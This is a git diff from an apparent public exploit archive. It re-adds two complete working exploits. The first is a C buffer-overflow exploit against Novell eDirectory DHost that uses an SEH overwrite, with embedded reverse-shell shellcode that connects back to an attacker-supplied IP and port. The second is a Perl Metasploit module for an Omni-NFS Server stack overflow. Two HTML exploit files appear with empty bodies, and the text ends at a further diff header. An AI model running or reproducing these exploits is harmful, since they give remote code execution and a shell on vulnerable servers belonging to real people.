@@ -1,225 +1,225 @@ -/* - _______ ________ .__ _____ __ -___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __ -\ \/ / /_\ \ / \ _(__ < ______ | | \ / | |__/ ___\| |/ / - > <\ \_/ \ | \/ \ /_____/ | Y \/ ^ /\ \___| < -/__/\_ \\_____ /___| /______ / |___| /\____ | \___ >__|_ \ - \/ \/ \/ \/ 30\10\06 \/ |__| \/ \/ - - * mm. dM8 - * YMMMb. dMM8 _____________________________________ - * YMMMMb dMMM' [ ] - * `YMMMb dMMMP [ There are doors I have yet to open ] - * `YMMM MMM' [ windows I have yet to look through ] - * "MbdMP [ Going forward may not be the answer ] - * .dMMMMMM.P [ ] - * dMM MMMMMM [ maybe I should go back ] - * 8MMMMMMMMMMI [_____________________________________] - * YMMMMMMMMM www.netbunny.org - * "MMMMMMP - * MxM .mmm - * W"W """ - - -[i] Title: Novell eDirectory <= 9.0 DHost Buffer overflow exploit -[i] Discovered by: Novell -[i] Original code by: FistFuXXer -[i] Exploit by: Expanders -[i] Filename: XHNB-Novell-eDirectory_remote_bof.c -[i] References: http://www.novell.com/ -[i] Greatings: x0n3-h4ck - netbunny - -[ Research diary ] - -After a try of FistFuXXer's perl exploit I started to port the code in C and also use a different exploiting -method. This exploit overwrite the Second Exception Handler to take control of the program flow. 
- -[ Special thanks ] - -FistFuXXer -H D Moore - -[ Links ] - -www.x0n3-h4ck.org -www.netbunny.org - -*/ - -#include -#include -#include -#include -#include -#include -#include - -#define BUFFSIZE 1000 // Buffer size -#define DEADRET "\xde\xc0\xad\xde" // this address cause the exception to be called - -int banner(); -int usage(char *filename); -int inject(char *port, char *ip); -int remote_connect( char* ip, unsigned short port ); - - -char attack[] = -"GET /nds HTTP/1.1\r\n" -"Host: %s\r\n\r\n"; - -/* win32_reverse - EXITFUNC=seh Size=312 Encoder=Pex http://metasploit.com */ -char shellcode[] = -"\x29\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f" -"\x61\x88\x6f\x83\xeb\xfc\xe2\xf4\xc3\x0b\x63\x22\xd7\x98\x77\x90" -"\xc0\x01\x03\x03\x1b\x45\x03\x2a\x03\xea\xf4\x6a\x47\x60\x67\xe4" -"\x70\x79\x03\x30\x1f\x60\x63\x26\xb4\x55\x03\x6e\xd1\x50\x48\xf6" -"\x93\xe5\x48\x1b\x38\xa0\x42\x62\x3e\xa3\x63\x9b\x04\x35\xac\x47" -"\x4a\x84\x03\x30\x1b\x60\x63\x09\xb4\x6d\xc3\xe4\x60\x7d\x89\x84" -"\x3c\x4d\x03\xe6\x53\x45\x94\x0e\xfc\x50\x53\x0b\xb4\x22\xb8\xe4" -"\x7f\x6d\x03\x1f\x23\xcc\x03\x2f\x37\x3f\xe0\xe1\x71\x6f\x64\x3f" -"\xc0\xb7\xee\x3c\x59\x09\xbb\x5d\x57\x16\xfb\x5d\x60\x35\x77\xbf" -"\x57\xaa\x65\x93\x04\x31\x77\xb9\x60\xe8\x6d\x09\xbe\x8c\x80\x6d" -"\x6a\x0b\x8a\x90\xef\x09\x51\x66\xca\xcc\xdf\x90\xe9\x32\xdb\x3c" -"\x6c\x22\xdb\x2c\x6c\x9e\x58\x07\x35\x61\x88\x6c\x59\x09\x8c\x69" -"\x59\x32\x01\x8e\xaa\x09\x64\x96\x95\x01\xdf\x90\xe9\x0b\x98\x3e" -"\x6a\x9e\x58\x09\x55\x05\xee\x07\x5c\x0c\xe2\x3f\x66\x48\x44\xe6" -"\xd8\x0b\xcc\xe6\xdd\x50\x48\x9c\x95\xf4\x01\x92\xc1\x23\xa5\x91" -"\x7d\x4d\x05\x15\x07\xca\x23\xc4\x57\x13\x76\xdc\x29\x9e\xfd\x47" -"\xc0\xb7\xd3\x38\x6d\x30\xd9\x3e\x55\x60\xd9\x3e\x6a\x30\x77\xbf" -"\x57\xcc\x51\x6a\xf1\x32\x77\xb9\x55\x9e\x77\x58\xc0\xb1\xe0\x88" -"\x46\xa7\xf1\x90\x4a\x65\x77\xb9\xc0\x16\x74\x90\xef\x09\x78\xe5" -"\x3b\x3e\xdb\x90\xe9\x9e\x58\x6f"; - -char jmpback[]= -//22 byte xor decoder (0x55) 
-"\xEB\x0F\x5B\x33\xC9\x66\x83\xE9\xE0\x80\x33\x55\x43\xE2\xFA\xEB\x05\xE8\xEC\xFF\xFF\xFF" -//(20 byte jump-back code -> 256 + 256 + 64 bytes) -"\x8C\xBB\x8C\x21\x71\xA1\x0C\xD5\x94\x5F\xC5\xAB\x98\xAB\x98\xD5\xBC\x15\xAA\xB4"; - -char jmpover[]= -// 2 bytes jump 6 bytes over - 2 bytes NOP -"\xEb\x06\x90\x90"; - -struct retcodes{char *platform;unsigned long addr;} targets[]= { - { "eDirectory MFC42U.dll", 0x5f80bbf7 }, - { "Windows NT SP 5/6" , 0x776a1082 }, // ws2help.dll pop esi, pop ebx, retn [Tnx to metasploit] - { "Windows 2k Universal" , 0x750211a9 }, // ws2help.dll pop ebp, pop ebx, retn [Tnx to metasploit] - { "Windows XP Universal" , 0x71abe325 }, // ws2help.dll pop ebx, pop ebp, retn [Tnx to metasploit] - { NULL } -}; -int banner() { - printf("\n _______ ________ .__ _____ __ \n"); - printf("___ __\\ _ \\ ____ \\_____ \\ | |__ / | | ____ | | __ \n"); - printf("\\ \\/ / /_\\ \\ / \\ _(__ < ______ | | \\ / | |__/ ___\\| |/ / \n"); - printf(" > <\\ \\_/ \\ | \\/ \\ /_____/ | Y \\/ ^ /\\ \\___| < \n"); - printf("/__/\\_ \\\\_____ /___| /______ / |___| /\\____ | \\___ >__|_ \\ \n"); - printf(" \\/ \\/ \\/ \\/ \\/ |__| \\/ \\/ \n\n"); - printf("[i] Title: \tNovell eDirectory DHost Buffer overflow\n"); - printf("[i] Perl Code by:\tFistFuXXer\n"); - printf("[i] Exploit by: \tExpanders\n\n"); - return 0; -} - -int usage(char *filename) { - int i; - printf("Usage: \t%s \n\n",filename); - printf(" \t : Victim's host\n"); - printf(" \t : Victim's port :: Default: 8028\n"); - printf(" \t : Local ip address for connectback\n"); - printf(" \t : Local port for connectback\n"); - printf(" \t : Target from the list below\n\n"); - - printf("# \t Platform\n"); - printf("-----------------------------------------------\n"); - for(i = 0; targets[i].platform; i++) - printf("%d \t %s\n",i,targets[i].platform); - printf("-----------------------------------------------\n"); - exit(0); -} - -int inject(char *port, char *ip) -{ - unsigned long xorip; - unsigned short xorport; - 
xorip = inet_addr(ip)^(unsigned long)0x6F88613F; - xorport = htons(atoi( port ))^(unsigned short)0x6F88; - memcpy ( &shellcode[184], &xorip, 4); - memcpy ( &shellcode[190], &xorport, 2); - return 0; -} - -int remote_connect( char* ip, unsigned short port ) -{ - int s; - struct sockaddr_in remote_addr; - struct hostent* host_addr; - - memset ( &remote_addr, 0x0, sizeof ( remote_addr ) ); - if ( ( host_addr = gethostbyname ( ip ) ) == NULL ) - { - printf ( "[X] Cannot resolve \"%s\"\n", ip ); - exit ( 1 ); - } - remote_addr.sin_family = AF_INET; - remote_addr.sin_port = htons ( port ); - remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr ); - if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 ) - { - printf ( "[X] Socket failed!\n" ); - exit ( 1 ); - } - if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 ) - { - printf ( "[X] Failed connecting!\n" ); - exit ( 1 ); - } - return ( s ); -} - -int main(int argc, char *argv[]) { - int s,position; - unsigned int rcv; - char *buffer,*request; - char recvbuf[256]; - banner(); - if( (argc != 6) || (atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534) ) - usage(argv[0]); - position = 0; - printf("[+] Creating evil buffer\n"); - buffer = (char *) malloc(BUFFSIZE); - request = (char *) malloc(BUFFSIZE + strlen(attack)); // +3 == \r + \n + 0x00 - memset(buffer,0x90,BUFFSIZE); // Fill with nops - - inject(argv[4],argv[3]); // Xor port and ip and put them into the shellcode - memset(buffer,0x41,68); // First comes the ascii - position = 68; - memcpy(buffer+position,DEADRET,4); - position = 680 - (strlen(shellcode) + 100); // 680 : Pointer to next Execption structure - memcpy(buffer+position,shellcode,strlen(shellcode)); - position += strlen(shellcode)+100; - memcpy(buffer+position,jmpover,4); position += 4; - memcpy(buffer+position,&targets[atoi(argv[5])].addr,4); position += 4; - position += 8; // 8 bytes more nops - memcpy(buffer+position,jmpback,strlen(jmpback)); position += 
strlen(jmpback); - position += 8; // 8 bytes more nops - memset(buffer+position,0x00,1); // End - - - sprintf(request,attack,buffer); - printf("[+] Connecting to remote host\n"); - s = remote_connect(argv[1],atoi(argv[2])); - sleep(1); - printf("[+] Sending %d bytes of painfull buffer\n",strlen(buffer)); - if ( send ( s, request, strlen (request), 0) <= 0 ) - { - printf("[X] Failed to send buffer\n"); - exit ( 1 ); - } - printf("[+] Done - Wait for shell on port %s\n",argv[4]); - close(s); - free(buffer); - buffer = NULL; - return 0; -} - -// milw0rm.com [2006-10-30] +/* + _______ ________ .__ _____ __ +___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __ +\ \/ / /_\ \ / \ _(__ < ______ | | \ / | |__/ ___\| |/ / + > <\ \_/ \ | \/ \ /_____/ | Y \/ ^ /\ \___| < +/__/\_ \\_____ /___| /______ / |___| /\____ | \___ >__|_ \ + \/ \/ \/ \/ 30\10\06 \/ |__| \/ \/ + + * mm. dM8 + * YMMMb. dMM8 _____________________________________ + * YMMMMb dMMM' [ ] + * `YMMMb dMMMP [ There are doors I have yet to open ] + * `YMMM MMM' [ windows I have yet to look through ] + * "MbdMP [ Going forward may not be the answer ] + * .dMMMMMM.P [ ] + * dMM MMMMMM [ maybe I should go back ] + * 8MMMMMMMMMMI [_____________________________________] + * YMMMMMMMMM www.netbunny.org + * "MMMMMMP + * MxM .mmm + * W"W """ + + +[i] Title: Novell eDirectory <= 9.0 DHost Buffer overflow exploit +[i] Discovered by: Novell +[i] Original code by: FistFuXXer +[i] Exploit by: Expanders +[i] Filename: XHNB-Novell-eDirectory_remote_bof.c +[i] References: http://www.novell.com/ +[i] Greatings: x0n3-h4ck - netbunny + +[ Research diary ] + +After a try of FistFuXXer's perl exploit I started to port the code in C and also use a different exploiting +method. This exploit overwrite the Second Exception Handler to take control of the program flow. 
+ +[ Special thanks ] + +FistFuXXer +H D Moore + +[ Links ] + +www.x0n3-h4ck.org +www.netbunny.org + +*/ + +#include +#include +#include +#include +#include +#include +#include + +#define BUFFSIZE 1000 // Buffer size +#define DEADRET "\xde\xc0\xad\xde" // this address cause the exception to be called + +int banner(); +int usage(char *filename); +int inject(char *port, char *ip); +int remote_connect( char* ip, unsigned short port ); + + +char attack[] = +"GET /nds HTTP/1.1\r\n" +"Host: %s\r\n\r\n"; + +/* win32_reverse - EXITFUNC=seh Size=312 Encoder=Pex http://metasploit.com */ +char shellcode[] = +"\x29\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f" +"\x61\x88\x6f\x83\xeb\xfc\xe2\xf4\xc3\x0b\x63\x22\xd7\x98\x77\x90" +"\xc0\x01\x03\x03\x1b\x45\x03\x2a\x03\xea\xf4\x6a\x47\x60\x67\xe4" +"\x70\x79\x03\x30\x1f\x60\x63\x26\xb4\x55\x03\x6e\xd1\x50\x48\xf6" +"\x93\xe5\x48\x1b\x38\xa0\x42\x62\x3e\xa3\x63\x9b\x04\x35\xac\x47" +"\x4a\x84\x03\x30\x1b\x60\x63\x09\xb4\x6d\xc3\xe4\x60\x7d\x89\x84" +"\x3c\x4d\x03\xe6\x53\x45\x94\x0e\xfc\x50\x53\x0b\xb4\x22\xb8\xe4" +"\x7f\x6d\x03\x1f\x23\xcc\x03\x2f\x37\x3f\xe0\xe1\x71\x6f\x64\x3f" +"\xc0\xb7\xee\x3c\x59\x09\xbb\x5d\x57\x16\xfb\x5d\x60\x35\x77\xbf" +"\x57\xaa\x65\x93\x04\x31\x77\xb9\x60\xe8\x6d\x09\xbe\x8c\x80\x6d" +"\x6a\x0b\x8a\x90\xef\x09\x51\x66\xca\xcc\xdf\x90\xe9\x32\xdb\x3c" +"\x6c\x22\xdb\x2c\x6c\x9e\x58\x07\x35\x61\x88\x6c\x59\x09\x8c\x69" +"\x59\x32\x01\x8e\xaa\x09\x64\x96\x95\x01\xdf\x90\xe9\x0b\x98\x3e" +"\x6a\x9e\x58\x09\x55\x05\xee\x07\x5c\x0c\xe2\x3f\x66\x48\x44\xe6" +"\xd8\x0b\xcc\xe6\xdd\x50\x48\x9c\x95\xf4\x01\x92\xc1\x23\xa5\x91" +"\x7d\x4d\x05\x15\x07\xca\x23\xc4\x57\x13\x76\xdc\x29\x9e\xfd\x47" +"\xc0\xb7\xd3\x38\x6d\x30\xd9\x3e\x55\x60\xd9\x3e\x6a\x30\x77\xbf" +"\x57\xcc\x51\x6a\xf1\x32\x77\xb9\x55\x9e\x77\x58\xc0\xb1\xe0\x88" +"\x46\xa7\xf1\x90\x4a\x65\x77\xb9\xc0\x16\x74\x90\xef\x09\x78\xe5" +"\x3b\x3e\xdb\x90\xe9\x9e\x58\x6f"; + +char jmpback[]= +//22 byte xor decoder (0x55) 
+"\xEB\x0F\x5B\x33\xC9\x66\x83\xE9\xE0\x80\x33\x55\x43\xE2\xFA\xEB\x05\xE8\xEC\xFF\xFF\xFF" +//(20 byte jump-back code -> 256 + 256 + 64 bytes) +"\x8C\xBB\x8C\x21\x71\xA1\x0C\xD5\x94\x5F\xC5\xAB\x98\xAB\x98\xD5\xBC\x15\xAA\xB4"; + +char jmpover[]= +// 2 bytes jump 6 bytes over - 2 bytes NOP +"\xEb\x06\x90\x90"; + +struct retcodes{char *platform;unsigned long addr;} targets[]= { + { "eDirectory MFC42U.dll", 0x5f80bbf7 }, + { "Windows NT SP 5/6" , 0x776a1082 }, // ws2help.dll pop esi, pop ebx, retn [Tnx to metasploit] + { "Windows 2k Universal" , 0x750211a9 }, // ws2help.dll pop ebp, pop ebx, retn [Tnx to metasploit] + { "Windows XP Universal" , 0x71abe325 }, // ws2help.dll pop ebx, pop ebp, retn [Tnx to metasploit] + { NULL } +}; +int banner() { + printf("\n _______ ________ .__ _____ __ \n"); + printf("___ __\\ _ \\ ____ \\_____ \\ | |__ / | | ____ | | __ \n"); + printf("\\ \\/ / /_\\ \\ / \\ _(__ < ______ | | \\ / | |__/ ___\\| |/ / \n"); + printf(" > <\\ \\_/ \\ | \\/ \\ /_____/ | Y \\/ ^ /\\ \\___| < \n"); + printf("/__/\\_ \\\\_____ /___| /______ / |___| /\\____ | \\___ >__|_ \\ \n"); + printf(" \\/ \\/ \\/ \\/ \\/ |__| \\/ \\/ \n\n"); + printf("[i] Title: \tNovell eDirectory DHost Buffer overflow\n"); + printf("[i] Perl Code by:\tFistFuXXer\n"); + printf("[i] Exploit by: \tExpanders\n\n"); + return 0; +} + +int usage(char *filename) { + int i; + printf("Usage: \t%s \n\n",filename); + printf(" \t : Victim's host\n"); + printf(" \t : Victim's port :: Default: 8028\n"); + printf(" \t : Local ip address for connectback\n"); + printf(" \t : Local port for connectback\n"); + printf(" \t : Target from the list below\n\n"); + + printf("# \t Platform\n"); + printf("-----------------------------------------------\n"); + for(i = 0; targets[i].platform; i++) + printf("%d \t %s\n",i,targets[i].platform); + printf("-----------------------------------------------\n"); + exit(0); +} + +int inject(char *port, char *ip) +{ + unsigned long xorip; + unsigned short xorport; + 
xorip = inet_addr(ip)^(unsigned long)0x6F88613F; + xorport = htons(atoi( port ))^(unsigned short)0x6F88; + memcpy ( &shellcode[184], &xorip, 4); + memcpy ( &shellcode[190], &xorport, 2); + return 0; +} + +int remote_connect( char* ip, unsigned short port ) +{ + int s; + struct sockaddr_in remote_addr; + struct hostent* host_addr; + + memset ( &remote_addr, 0x0, sizeof ( remote_addr ) ); + if ( ( host_addr = gethostbyname ( ip ) ) == NULL ) + { + printf ( "[X] Cannot resolve \"%s\"\n", ip ); + exit ( 1 ); + } + remote_addr.sin_family = AF_INET; + remote_addr.sin_port = htons ( port ); + remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr ); + if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 ) + { + printf ( "[X] Socket failed!\n" ); + exit ( 1 ); + } + if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 ) + { + printf ( "[X] Failed connecting!\n" ); + exit ( 1 ); + } + return ( s ); +} + +int main(int argc, char *argv[]) { + int s,position; + unsigned int rcv; + char *buffer,*request; + char recvbuf[256]; + banner(); + if( (argc != 6) || (atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534) ) + usage(argv[0]); + position = 0; + printf("[+] Creating evil buffer\n"); + buffer = (char *) malloc(BUFFSIZE); + request = (char *) malloc(BUFFSIZE + strlen(attack)); // +3 == \r + \n + 0x00 + memset(buffer,0x90,BUFFSIZE); // Fill with nops + + inject(argv[4],argv[3]); // Xor port and ip and put them into the shellcode + memset(buffer,0x41,68); // First comes the ascii + position = 68; + memcpy(buffer+position,DEADRET,4); + position = 680 - (strlen(shellcode) + 100); // 680 : Pointer to next Execption structure + memcpy(buffer+position,shellcode,strlen(shellcode)); + position += strlen(shellcode)+100; + memcpy(buffer+position,jmpover,4); position += 4; + memcpy(buffer+position,&targets[atoi(argv[5])].addr,4); position += 4; + position += 8; // 8 bytes more nops + memcpy(buffer+position,jmpback,strlen(jmpback)); position += 
strlen(jmpback);
+ position += 8; // 8 bytes more nops
+ memset(buffer+position,0x00,1); // End
+
+
+ sprintf(request,attack,buffer);
+ printf("[+] Connecting to remote host\n");
+ s = remote_connect(argv[1],atoi(argv[2]));
+ sleep(1);
+ printf("[+] Sending %d bytes of painfull buffer\n",strlen(buffer));
+ if ( send ( s, request, strlen (request), 0) <= 0 )
+ {
+ printf("[X] Failed to send buffer\n");
+ exit ( 1 );
+ }
+ printf("[+] Done - Wait for shell on port %s\n",argv[4]);
+ close(s);
+ free(buffer);
+ buffer = NULL;
+ return 0;
+}
+
+// milw0rm.com [2006-10-30]
diff --git a/platforms/windows/remote/2729.pm b/platforms/windows/remote/2729.pm
index e8e913b01..5f218ca6e 100755
--- a/platforms/windows/remote/2729.pm
+++ b/platforms/windows/remote/2729.pm
@@ -1,141 +1,141 @@ -# vd_xlink.pm -# -# The exploit is a part of VulnDisco Pack - use only under the license agreement -# specified in LICENSE.txt in your VulnDisco distribution - -# VULNDISCO LICENSE - -# Purchaser buys VulnDisco Pack ("the Pack") and receives the right to use it under the terms of the following License. - -# The Pack with all the data and software contained in it is the private property of GLEG ltd. Company ("the Company"). The Company is the only entity who has exclusive rights to the Pack. The Pack with all the software and data containing in it is the intellectual property of the Company and is guarded by intellectual property laws. - -# Purchaser has the rights to use the Pack only under the terms and conditions of this License to the maximum extent permitted by applicable law. -# Purchaser has the rights to use the Pack only for his own needs or for the needs of his company if the License is purchased by the company. For the means of this License by purchaser's company those people are meant who directly works for the company which owns the License. -# Purchaser is granted nonexclusive, non-transferable rights to use the Pack. - -# Purchaser is allowed to install the Pack on unlimited number of seats. - -# Purchaser is not restricted to use the Pack to test the particular IP range. - -# Purchaser is not allowed to disclose the Pack in whole or partly, to disclose any information concerning the Pack or any information derived from the Pack. Purchaser is not allowed to transfer the Pack or any data concerning it (including derived data), anyhow or by any means to third party entities. Purchaser is not allowed to sell or redistribute or otherwise transfer the rights to the Pack unless otherwise is expressly stated in writing by the Company. - -# Purchaser realizes that the Pack is provided as-is without warranty of any kind, including warranties that the Pack suits particular needs, is safe to use, or contain no issues. 
- -# Purchaser realizes that the Pack contains potentially dangerous information which being improper used or misused can cause damage to Purchaser or to Purchaser's company or to third party organizations and individuals. - -# The Company is not responsible for any losses to purchaser or to purchaser's company resulted from Purchaser's proper or improper use or inability to use the Pack, including but not limited to loss of information, damages to computers or to network infrastructure. The Company is not responsible for any losses to any third party organizations or individuals resulted from Purchaser's intentional or accidental use or misuse of the Pack. The Company is not responsible for any consequences of Purchaser's disclosure of the Pack. - -# Purchaser realizes that he is solely responsible for any claims resulted from Purchaser's acquisition, use or misuse of the Pack and agrees to defend Company from mentioned claims at own cost. - -# Purchaser agrees to take all necessary measures to not allow disclosure of the Pack, to use it only under the terms of this License and applicable law. Purchaser has been informed and agrees that in case of Purchaser.s breach of any provisions of this License the Company has right to take appropriate measures including legal prosecution. - -# All information that is provided for Purchaser by the Company, including Pack updates and support information, is provided under the same terms as in the Pack License. As for newer versions of the Pack, the Company reserves the right to issue new License with them. - -# This License is designed in accordance with the laws of Russian Federation. -# License terms are governed by the laws of Russian Federation. Unless otherwise is agreed in writing, all disputes relating to this License shall be subject to final and binding arbitration in Russia, Moscow. 
- -# Purchaser has been informed and agrees that after installation of the Pack this Agreement is considered as signed and came into force as Agreement between the Company and Purchaser. - -# Purchaser has read and understood this License, and agrees to its terms and conditions. - -use strict; - -package Msf::Exploit::vd_xlink; -use base "Msf::Exploit"; -use Pex::Text; - -my $advanced = { }; - -my $info = -{ - "Name" => "[0day] Omni-NFS Server overflow", - "Version" => "\$Revision: 1.0 \$", - "Authors" => ["Evgeny Legerov"], - "Arch" => ["x86"], - "OS" => ["win32"], - "Priv" => 1, - "UserOpts" => - { - "RHOST" => [1, "ADDR", "The target address"], - "RPORT" => [1, "PORT", "The target port", 2049], - }, - - "Description" => Pex::Text::Freeform(q{ - Exploit for Omni-NFS Server stack overflow vulnerability. - }), - - - "Payload" => - { - "Space" => 427, - }, - - "DefaultTarget" => 0, - "Targets" => - [ - ["Omni-NFS Server 5.2 (nfsd.exe: call ebx) / Windows 2000 SP4", 0x00401843] - - ], - - "Keys" => ["vd_xlink"], -}; - -sub new { - my $class = shift; - return $class->SUPER::new({"Info" => $info, "Advanced" => $advanced}, @_); -} - -sub Exploit { - my $self = shift; - my $host = $self->GetVar("RHOST"); - my $port = $self->GetVar("RPORT"); - my $writedir = $self->GetVar("DIR"); - my $bind_port = $self->GetVar("LPORT"); - my $target = $self->Targets->[$self->GetVar("TARGET")]; - my $encodedPayload = $self->GetVar("EncodedPayload"); - my $shellcode = $encodedPayload->Payload; - - my $payload = ""; - $payload .= "\x4d" x 9; - $payload .= $shellcode; - $payload .= "\x4d" x (427 - length($shellcode)); - $payload .= "\x4d\x4d\x4d\x2d"; - $payload .= pack("V", $target->[1]); - $payload .= "\xe9\x17\xfb\xff\xff"; # jmp $-1257 - $payload .= "\x45" x 351; - - my $s = ""; - $s .= pack("N", 1); - $s .= pack("N", 0); - $s .= pack("N", 2); - $s .= pack("N", 100005); - $s .= pack("N", 1); - $s .= pack("N", 1); - - $s .= pack("N", 1); - $s .= pack("N", 400); - $s .= substr($payload, 0, 
400); - - $s .= pack("N", 1); - $s .= pack("N", 400); - $s .= substr($payload, 400); - - - my $req = pack("N", length($s) | 0x80000000) . $s; - - my $sock = Msf::Socket::Tcp->new("PeerAddr" => $host, "PeerPort" => $port); - if ($sock->IsError) { - $self->PrintLine("Error creating socket: " . $sock->GetError); - return; - } - - $sock->Send($req); - - sleep(3); - - $sock->Close(); -} - -__END__ - -# milw0rm.com [2006-11-06] +# vd_xlink.pm +# +# The exploit is a part of VulnDisco Pack - use only under the license agreement +# specified in LICENSE.txt in your VulnDisco distribution + +# VULNDISCO LICENSE + +# Purchaser buys VulnDisco Pack ("the Pack") and receives the right to use it under the terms of the following License. + +# The Pack with all the data and software contained in it is the private property of GLEG ltd. Company ("the Company"). The Company is the only entity who has exclusive rights to the Pack. The Pack with all the software and data containing in it is the intellectual property of the Company and is guarded by intellectual property laws. + +# Purchaser has the rights to use the Pack only under the terms and conditions of this License to the maximum extent permitted by applicable law. +# Purchaser has the rights to use the Pack only for his own needs or for the needs of his company if the License is purchased by the company. For the means of this License by purchaser's company those people are meant who directly works for the company which owns the License. +# Purchaser is granted nonexclusive, non-transferable rights to use the Pack. + +# Purchaser is allowed to install the Pack on unlimited number of seats. + +# Purchaser is not restricted to use the Pack to test the particular IP range. + +# Purchaser is not allowed to disclose the Pack in whole or partly, to disclose any information concerning the Pack or any information derived from the Pack. 
Purchaser is not allowed to transfer the Pack or any data concerning it (including derived data), anyhow or by any means to third party entities. Purchaser is not allowed to sell or redistribute or otherwise transfer the rights to the Pack unless otherwise is expressly stated in writing by the Company. + +# Purchaser realizes that the Pack is provided as-is without warranty of any kind, including warranties that the Pack suits particular needs, is safe to use, or contain no issues. + +# Purchaser realizes that the Pack contains potentially dangerous information which being improper used or misused can cause damage to Purchaser or to Purchaser's company or to third party organizations and individuals. + +# The Company is not responsible for any losses to purchaser or to purchaser's company resulted from Purchaser's proper or improper use or inability to use the Pack, including but not limited to loss of information, damages to computers or to network infrastructure. The Company is not responsible for any losses to any third party organizations or individuals resulted from Purchaser's intentional or accidental use or misuse of the Pack. The Company is not responsible for any consequences of Purchaser's disclosure of the Pack. + +# Purchaser realizes that he is solely responsible for any claims resulted from Purchaser's acquisition, use or misuse of the Pack and agrees to defend Company from mentioned claims at own cost. + +# Purchaser agrees to take all necessary measures to not allow disclosure of the Pack, to use it only under the terms of this License and applicable law. Purchaser has been informed and agrees that in case of Purchaser.s breach of any provisions of this License the Company has right to take appropriate measures including legal prosecution. + +# All information that is provided for Purchaser by the Company, including Pack updates and support information, is provided under the same terms as in the Pack License. 
As for newer versions of the Pack, the Company reserves the right to issue new License with them. + +# This License is designed in accordance with the laws of Russian Federation. +# License terms are governed by the laws of Russian Federation. Unless otherwise is agreed in writing, all disputes relating to this License shall be subject to final and binding arbitration in Russia, Moscow. + +# Purchaser has been informed and agrees that after installation of the Pack this Agreement is considered as signed and came into force as Agreement between the Company and Purchaser. + +# Purchaser has read and understood this License, and agrees to its terms and conditions. + +use strict; + +package Msf::Exploit::vd_xlink; +use base "Msf::Exploit"; +use Pex::Text; + +my $advanced = { }; + +my $info = +{ + "Name" => "[0day] Omni-NFS Server overflow", + "Version" => "\$Revision: 1.0 \$", + "Authors" => ["Evgeny Legerov"], + "Arch" => ["x86"], + "OS" => ["win32"], + "Priv" => 1, + "UserOpts" => + { + "RHOST" => [1, "ADDR", "The target address"], + "RPORT" => [1, "PORT", "The target port", 2049], + }, + + "Description" => Pex::Text::Freeform(q{ + Exploit for Omni-NFS Server stack overflow vulnerability. 
+ }), + + + "Payload" => + { + "Space" => 427, + }, + + "DefaultTarget" => 0, + "Targets" => + [ + ["Omni-NFS Server 5.2 (nfsd.exe: call ebx) / Windows 2000 SP4", 0x00401843] + + ], + + "Keys" => ["vd_xlink"], +}; + +sub new { + my $class = shift; + return $class->SUPER::new({"Info" => $info, "Advanced" => $advanced}, @_); +} + +sub Exploit { + my $self = shift; + my $host = $self->GetVar("RHOST"); + my $port = $self->GetVar("RPORT"); + my $writedir = $self->GetVar("DIR"); + my $bind_port = $self->GetVar("LPORT"); + my $target = $self->Targets->[$self->GetVar("TARGET")]; + my $encodedPayload = $self->GetVar("EncodedPayload"); + my $shellcode = $encodedPayload->Payload; + + my $payload = ""; + $payload .= "\x4d" x 9; + $payload .= $shellcode; + $payload .= "\x4d" x (427 - length($shellcode)); + $payload .= "\x4d\x4d\x4d\x2d"; + $payload .= pack("V", $target->[1]); + $payload .= "\xe9\x17\xfb\xff\xff"; # jmp $-1257 + $payload .= "\x45" x 351; + + my $s = ""; + $s .= pack("N", 1); + $s .= pack("N", 0); + $s .= pack("N", 2); + $s .= pack("N", 100005); + $s .= pack("N", 1); + $s .= pack("N", 1); + + $s .= pack("N", 1); + $s .= pack("N", 400); + $s .= substr($payload, 0, 400); + + $s .= pack("N", 1); + $s .= pack("N", 400); + $s .= substr($payload, 400); + + + my $req = pack("N", length($s) | 0x80000000) . $s; + + my $sock = Msf::Socket::Tcp->new("PeerAddr" => $host, "PeerPort" => $port); + if ($sock->IsError) { + $self->PrintLine("Error creating socket: " . $sock->GetError); + return; + } + + $sock->Send($req); + + sleep(3); + + $sock->Close(); +} + +__END__ + +# milw0rm.com [2006-11-06] diff --git a/platforms/windows/remote/2743.html b/platforms/windows/remote/2743.html index c4e266987..6187816f3 100755 --- a/platforms/windows/remote/2743.html +++ b/platforms/windows/remote/2743.html @@ -1,68 +1,68 @@ - - - - - - - - - - - - -# milw0rm.com [2006-11-08] + + + + + + + + + + + + +# milw0rm.com [2006-11-08] 
diff --git a/platforms/windows/remote/2749.html b/platforms/windows/remote/2749.html index 0c3b09e0f..fb8fe2567 100755 --- a/platforms/windows/remote/2749.html +++ b/platforms/windows/remote/2749.html @@ -1,71 +1,71 @@ - - - - - - - - - - - -# milw0rm.com [2006-11-10] + + + + + + + + + + + +# milw0rm.com [2006-11-10] diff --git a/platforms/windows/remote/2753.c b/platforms/windows/remote/2753.c index 762dbd8e6..7d7ba9ffb 100755 --- a/platforms/windows/remote/2753.c +++ b/platforms/windows/remote/2753.c 
